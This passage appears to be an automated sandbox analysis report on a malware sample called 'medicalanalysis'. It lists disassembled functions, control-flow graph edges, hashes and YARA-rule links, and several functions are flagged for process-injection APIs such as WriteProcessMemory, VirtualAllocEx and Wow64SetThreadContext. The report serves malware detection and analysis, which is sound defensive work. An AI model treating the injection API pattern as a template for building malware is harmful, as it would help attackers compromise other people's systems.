                                                                                                                                                                                                                                                                                                                • Instruction ID: b7369ae0b636913494dee575dbb009804ef2d8084607ddbf8b1c79d557c8240a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c15698e7137cfc32ca6f3a1f4ce088f983d4925afba8811f9abeb58a8f01a2d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6422F434E01218CFCB29DFE9D549AACBBB2FF49355F608469E806AB244CB355E85CF41
                                                                                                                                                                                                                                                                                                                Function 058529D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 2481 58529d0-58529f8 2482 58529ff-5852a28 2481->2482 2483 58529fa 2481->2483 2484 5852a49 2482->2484 2485 5852a2a-5852a33 2482->2485 2483->2482 2488 5852a4c-5852a50 2484->2488 2486 5852a35-5852a38 2485->2486 2487 5852a3a-5852a3d 2485->2487 2489 5852a47 2486->2489 2487->2489 2490 5852e07-5852e1e 2488->2490 2489->2488 2492 5852a55-5852a59 2490->2492 2493 5852e24-5852e28 2490->2493 2496 5852a5e-5852a62 2492->2496 2497 5852a5b-5852ab8 2492->2497 2494 5852e5d-5852e61 2493->2494 2495 5852e2a-5852e5a 2493->2495 2500 5852e63-5852e6c 2494->2500 2501 5852e82 2494->2501 2495->2494 2498 5852a64-5852a88 2496->2498 2499 5852a8b-5852aaf 2496->2499 2507 5852abd-5852ac1 2497->2507 2508 5852aba-5852b2b 2497->2508 2498->2499 2499->2490 2503 5852e73-5852e76 2500->2503 2504 5852e6e-5852e71 2500->2504 2505 5852e85-5852e8b 2501->2505 2510 5852e80 2503->2510 2504->2510 2513 5852ac3-5852ae7 2507->2513 2514 5852aea-5852b11 2507->2514 2516 5852b30-5852b34 2508->2516 2517 5852b2d-5852b8a 2508->2517 2510->2505 2513->2514 2536 5852b21-5852b22 2514->2536 2537 5852b13-5852b19 2514->2537 2520 5852b36-5852b5a 2516->2520 2521 5852b5d-5852b81 2516->2521 2526 5852b8c-5852be8 2517->2526 2527 5852b8f-5852b93 2517->2527 2520->2521 2521->2490 2538 5852bed-5852bf1 2526->2538 2539 5852bea-5852c4c 2526->2539 2528 5852b95-5852bb9 2527->2528 2529 5852bbc-5852bdf 2527->2529 2528->2529 2529->2490 2536->2490 2537->2536 2546 5852bf3-5852c17 2538->2546 2547 5852c1a-5852c32 2538->2547 2548 5852c51-5852c55 2539->2548 2549 5852c4e-5852cb0 2539->2549 2546->2547 2558 5852c34-5852c3a 2547->2558 2559 5852c42-5852c43 2547->2559 2556 5852c57-5852c7b 2548->2556 2557 5852c7e-5852c96 2548->2557 2560 5852cb5-5852cb9 2549->2560 2561 5852cb2-5852d14 2549->2561 2556->2557 2569 5852ca6-5852ca7 2557->2569 2570 5852c98-5852c9e 2557->2570 2558->2559 2559->2490 2567 5852ce2-5852cfa 2560->2567 2568 5852cbb-5852cdf 2560->2568 2571 5852d16-5852d78 2561->2571 2572 5852d19-5852d1d 2561->2572 2580 5852cfc-5852d02 2567->2580 2581 5852d0a-5852d0b 2567->2581 2568->2567 2569->2490 2570->2569 2582 5852d7d-5852d81 2571->2582 2583 5852d7a-5852dd3 2571->2583 2578 5852d46-5852d5e 2572->2578 2579 5852d1f-5852d43 2572->2579 2591 5852d60-5852d66 2578->2591 2592 5852d6e-5852d6f 2578->2592 2579->2578 2580->2581 2581->2490 2589 5852d83-5852da7 2582->2589 2590 5852daa-5852dc4 2582->2590 2593 5852dd5-5852df9 2583->2593 2594 5852dfc-5852dff 2583->2594 2589->2590 2602 5852dcc-5852dcd 2590->2602 2591->2592 2592->2490 2593->2594 2594->2490 2602->2490
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                                                                                                                                                                                                • Opcode ID: 982a3809c3d66a3de488bdc305fe67397b352f5e99494eb614afd07bf06c594f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 07510ab119447e8cfa26a12b627a539b9cabf626b1c3dedc9d0bf422b807aefd
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 982a3809c3d66a3de488bdc305fe67397b352f5e99494eb614afd07bf06c594f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0F1B238E05208DFCB19DFA4E5996ACBBB2FF49325F604529EC06A7251DB346D86CF40
                                                                                                                                                                                                                                                                                                                Function 058526A8 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 2606 58526a8-58526cd 2607 58526d4-58526f1 2606->2607 2608 58526cf 2606->2608 2609 58526f3-58526fc 2607->2609 2610 5852712 2607->2610 2608->2607 2611 5852703-5852706 2609->2611 2612 58526fe-5852701 2609->2612 2613 5852715-5852719 2610->2613 2614 5852710 2611->2614 2612->2614 2615 5852934-585294b 2613->2615 2614->2613 2617 5852951-5852955 2615->2617 2618 585271e-5852722 2615->2618 2619 5852957-585297c 2617->2619 2620 585297f-5852983 2617->2620 2621 5852724-58527c2 2618->2621 2622 585272a-585272e 2618->2622 2619->2620 2626 5852985-585298e 2620->2626 2627 58529a4 2620->2627 2631 58527c4-5852862 2621->2631 2632 58527ca-58527ce 2621->2632 2624 5852730-585273d 2622->2624 2625 5852758-585277d 2622->2625 2647 5852746-5852755 2624->2647 2653 585277f-5852788 2625->2653 2654 585279e 2625->2654 2629 5852995-5852998 2626->2629 2630 5852990-5852993 2626->2630 2628 58529a7-58529ad 2627->2628 2634 58529a2 2629->2634 2630->2634 2641 5852864-58528ff 2631->2641 2642 585286a-585286e 2631->2642 2637 58527d0-58527f5 2632->2637 2638 58527f8-585281d 2632->2638 2634->2628 2637->2638 2665 585281f-5852828 2638->2665 2666 585283e 2638->2666 2651 5852901-5852926 2641->2651 2652 5852929-585292c 2641->2652 2644 5852870-5852895 2642->2644 2645 5852898-58528bd 2642->2645 2644->2645 2679 58528bf-58528c8 2645->2679 2680 58528de 2645->2680 2647->2625 2651->2652 2652->2615 2661 585278f-5852792 2653->2661 2662 585278a-585278d 2653->2662 2655 58527a1-58527a8 2654->2655 2663 58527b8-58527b9 2655->2663 2664 58527aa-58527b0 2655->2664 2668 585279c 2661->2668 2662->2668 2663->2615 2664->2663 2671 585282f-5852832 2665->2671 2672 585282a-585282d 2665->2672 2673 5852841-5852848 2666->2673 2668->2655 2675 585283c 2671->2675 2672->2675 2676 5852858-5852859 2673->2676 2677 585284a-5852850 2673->2677 2675->2673 2676->2615 2677->2676 2681 58528cf-58528d2 2679->2681 2682 58528ca-58528cd 2679->2682 2683 58528e1-58528e8 2680->2683 2686 58528dc 2681->2686 2682->2686 2687 58528f8-58528f9 2683->2687 2688 58528ea-58528f0 2683->2688 2686->2683 2687->2615 2688->2687
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                                                                                                                                                                                                • Opcode ID: 58deb61264dc668776d03c72b0bf59726c9588bd92d44b4bc217b0d041044cf8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9ac3cafad432f729af240802e6ba3f82d74a1dfab4fd3e7ee0d51fc1394a7d20
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58deb61264dc668776d03c72b0bf59726c9588bd92d44b4bc217b0d041044cf8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AA1DF38E01209CFCB19DFA5D549AADBBB2BF88325F509429EC12A7354CB356D86CF50
                                                                                                                                                                                                                                                                                                                Function 00A79B39 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 2689 a79b39-a79b3f 2691 a79b41-a79b47 2689->2691 2692 a79b4d-a79b56 2691->2692 2693 a79b5f-a79b60 2692->2693 2694 a79b58 2692->2694 2703 a79dc8 2693->2703 2694->2693 2695 a79ea7-a79ebb 2694->2695 2696 a79b65-a79b8f 2694->2696 2697 a79c02-a79c1b 2694->2697 2698 a79f22-a79f29 2694->2698 2699 a79c61-a79c80 2694->2699 2700 a79d20-a79d3f 2694->2700 2701 a79d09-a79d1b 2694->2701 2702 a79be9-a79bfd 2694->2702 2694->2703 2704 a79c92-a79cd5 2694->2704 2705 a79d51-a79db2 2694->2705 2706 a79cda-a79cf3 2694->2706 2709 a79ebd-a79efa 2695->2709 2740 a79b9b-a79ba8 2696->2740 2718 a79c45 2697->2718 2719 a79c1d-a79c29 2697->2719 2707 a79f63-a79f98 2698->2707 2708 a79f2b-a79f54 2698->2708 2699->2706 2725 a79c82-a79c8d 2699->2725 2700->2706 2723 a79d41-a79d4c 2700->2723 2701->2692 2702->2709 2712 a79dd4-a79ea2 2703->2712 2704->2692 2705->2692 2747 a79db8-a79dc3 2705->2747 2706->2697 2720 a79cf9-a79d04 2706->2720 2729 a79f07-a79f10 2707->2729 2742 a79f9e-a79fa9 2707->2742 2708->2729 2730 a79f56-a79f61 2708->2730 2709->2729 2743 a79efc-a79f05 2709->2743 2712->2692 2732 a79c4b-a79c5c 2718->2732 2726 a79c33-a79c39 2719->2726 2727 a79c2b-a79c31 2719->2727 2720->2691 2723->2692 2725->2692 2735 a79c43 2726->2735 2727->2735 2738 a79f12 2729->2738 2739 a79f19-a79f1a 2729->2739 2730->2729 2732->2692 2735->2732 2738->2698 2738->2707 2738->2739 2744 a79fae 2738->2744 2745 a79f1c-a79f1d 2738->2745 2739->2698 2740->2706 2748 a79bae-a79bd5 2740->2748 2742->2729 2743->2729 2745->2744 2747->2692 2748->2692 2751 a79bdb-a79be4 2748->2751 2751->2692
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: PH]q$`Q]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2790359648
                                                                                                                                                                                                                                                                                                                • Opcode ID: e2cc8d33ca8db5227a0f0012a5f2cb17038e40e407a7fb0f82a34ba706067db7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3885692f727e938a9582cfdb30ad765ec6e447fe5de4e99c9a855ca58c2f31f7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2cc8d33ca8db5227a0f0012a5f2cb17038e40e407a7fb0f82a34ba706067db7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AFB1CF74904269CFDB64DFA8DC487EABAB1BB59301F1085EBD40EA2250D7B02EC5DF51
                                                                                                                                                                                                                                                                                                                Function 058967A9 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 2758 58967a9-58967ca 2759 58968be-58968e3 2758->2759 2760 58967d0-58967d2 2758->2760 2762 58968ea-589690e 2759->2762 2761 58967d8-58967e4 2760->2761 2760->2762 2767 58967f8-5896808 2761->2767 2768 58967e6-58967f2 2761->2768 2774 5896915-5896939 2762->2774 2767->2774 2775 589680e-589681c 2767->2775 2768->2767 2768->2774 2778 5896940-58969c5 call 58938e8 2774->2778 2775->2778 2779 5896822-5896827 2775->2779 2806 58969ca-58969d8 call 5895b90 2778->2806 2813 5896829 call 58967a9 2779->2813 2814 5896829 call 58969b8 2779->2814 2781 589682f-5896878 2796 589689b-58968bb call 5894990 2781->2796 2797 589687a-5896893 2781->2797 2797->2796 2809 58969da-58969e0 2806->2809 2810 58969f0-58969f2 2806->2810 2811 58969e2 2809->2811 2812 58969e4-58969e6 2809->2812 2811->2810 2812->2810 2813->2781 2814->2781
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq$Haq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3785302501
                                                                                                                                                                                                                                                                                                                • Opcode ID: 29b30afac8c8397a6a748d36c5c381cf493234ddd07877031f19eda08bb57c92
                                                                                                                                                                                                                                                                                                                • Instruction ID: d7e0c6f31e94d13fb23b845f6c7736e0f7009f681b7773412ade4582b8d53c52
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29b30afac8c8397a6a748d36c5c381cf493234ddd07877031f19eda08bb57c92
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 875199307002018FCB19AF39C455A6EBBF6EF89351B2444A9E906DB3A1DF31ED46CB91
                                                                                                                                                                                                                                                                                                                Function 05892FA7 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq$Haq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3785302501
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7ce1fb9572d4d28df35125975a8a59c465dad5ea8bb662f38de2cccdb12f97b2
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d7046411299526b5997426524e252302816704d62dc264759d1085402555cd4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce1fb9572d4d28df35125975a8a59c465dad5ea8bb662f38de2cccdb12f97b2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D451E3312047408FDB29DF2AC45035ABBF2EF84310F188A69D856CB3A6DF75ED498751
                                                                                                                                                                                                                                                                                                                Function 058CB795 Relevance: 2.5, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: "$'
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2422873937
                                                                                                                                                                                                                                                                                                                • Opcode ID: 00bc4dbc84f0dbc3d7a1e491420f5ba18ac34ce27e02b9937a49636a1c033566
                                                                                                                                                                                                                                                                                                                • Instruction ID: 08b36b3f1b7bafee3743b8dba4a06fe0bf779c80525c577c40265cea0f613895
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00bc4dbc84f0dbc3d7a1e491420f5ba18ac34ce27e02b9937a49636a1c033566
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0A474904668CFDB60DF54D844B9ABFF0BB05301F0085DAD849A3280D7349E81CF11
                                                                                                                                                                                                                                                                                                                Function 0589D800 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                • Opcode ID: 28997af9b9a8d02b07c4caedb49dc19a7b9decf6e13b11d6a69b1f010f94134a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 224e515da1ea5684fee785ebfd40c6f6a996bfcb34103c6c426da35059eded1e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28997af9b9a8d02b07c4caedb49dc19a7b9decf6e13b11d6a69b1f010f94134a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C521C75A002288FDB28DF68C985BDDBBF6BB88300F1545D9E949E7351DA309E81CF61
                                                                                                                                                                                                                                                                                                                Function 05897D50 Relevance: 1.8, Strings: 1, Instructions: 536COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (_]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-188044275
                                                                                                                                                                                                                                                                                                                • Opcode ID: 28b0d2fbbf479ccdbfb83c48dc57c99936d0a934e655e49b930e4b8ada7bccdd
                                                                                                                                                                                                                                                                                                                • Instruction ID: 39658b984d275c6655071c599be81f1811d9a5390293c5a14f165929acc75214
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28b0d2fbbf479ccdbfb83c48dc57c99936d0a934e655e49b930e4b8ada7bccdd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0224A71A002059FDB08DFA9C491AADBBF2FB89354F188059E906EB395CB71ED41CB90
                                                                                                                                                                                                                                                                                                                Function 057D12B8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 057D138B
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2ce0be6b469a407717e4cad10ca09109927a9bdb9b32c710c7ee92f7a973d051
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0f4f1a454a37466c738de450a024ad52f51430e619ff355105ded4ad4c58e7ea
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ce0be6b469a407717e4cad10ca09109927a9bdb9b32c710c7ee92f7a973d051
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB41AAB5D012589FCF00CFA9D984ADEFBF1BB49310F24902AE819B7210D735AA45CF64
                                                                                                                                                                                                                                                                                                                Function 057D0FC0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057D106A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5b6e578aaa1c5f2b028297aff8d94f8e5f47f54d2f2b1950052ef0fcafe5ea61
                                                                                                                                                                                                                                                                                                                • Instruction ID: f122da4e77fe1fab0be63355c7172a03840fbc0861ac95ce8e51eb4a5aa08893
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6e578aaa1c5f2b028297aff8d94f8e5f47f54d2f2b1950052ef0fcafe5ea61
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 133195B8D00258DFCF10DFA9D980ADEFBB1BB49310F10942AE815BB210D735A946CF68
                                                                                                                                                                                                                                                                                                                Function 04AA0F90 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 04AA103C
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: bc9108c318668d1fe08caeb3aa339eafa56d47030595b6dacf3fbef09b0868ff
                                                                                                                                                                                                                                                                                                                • Instruction ID: f945f39d7290749c044457741b0713a7776d9fb1fc3d120333c5f22649cdf70a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc9108c318668d1fe08caeb3aa339eafa56d47030595b6dacf3fbef09b0868ff
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0631C8B8D00258AFDF10CFA9D884AEEFBB0FB49310F20942AE815B7210D775A946CF54
                                                                                                                                                                                                                                                                                                                Function 04AA0F98 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 04AA103C
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2853288774.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_4aa0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7003c66ffc7c607e6de5b89b22841f7a920f30c2d93b79c1ba30f10ee009463d
                                                                                                                                                                                                                                                                                                                • Instruction ID: cd32dc27be43197d5a516c11e84d2891a3c9b230d8d4c11af48c28a7a10ef246
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7003c66ffc7c607e6de5b89b22841f7a920f30c2d93b79c1ba30f10ee009463d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A3197B8D01258AFDF10CFA9D984ADEFBB1FB49310F24942AE814B7210D735A946CF94
                                                                                                                                                                                                                                                                                                                Function 057D0900 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 057D09AF
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 04732f87f027203a1b0c9c3912a711d709d19a1b10e1f2aabcee0295fe33dfa7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5cf4d0680f5f0b304322e4dc4dbdec3bdf87e0894c80b4243b0d2fab8a026f43
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04732f87f027203a1b0c9c3912a711d709d19a1b10e1f2aabcee0295fe33dfa7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8931DCB4D012589FDB10CFA9D888AEEFBF0BB49310F24802AE405B7250D738A945CF64
                                                                                                                                                                                                                                                                                                                Function 05A3CC10 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
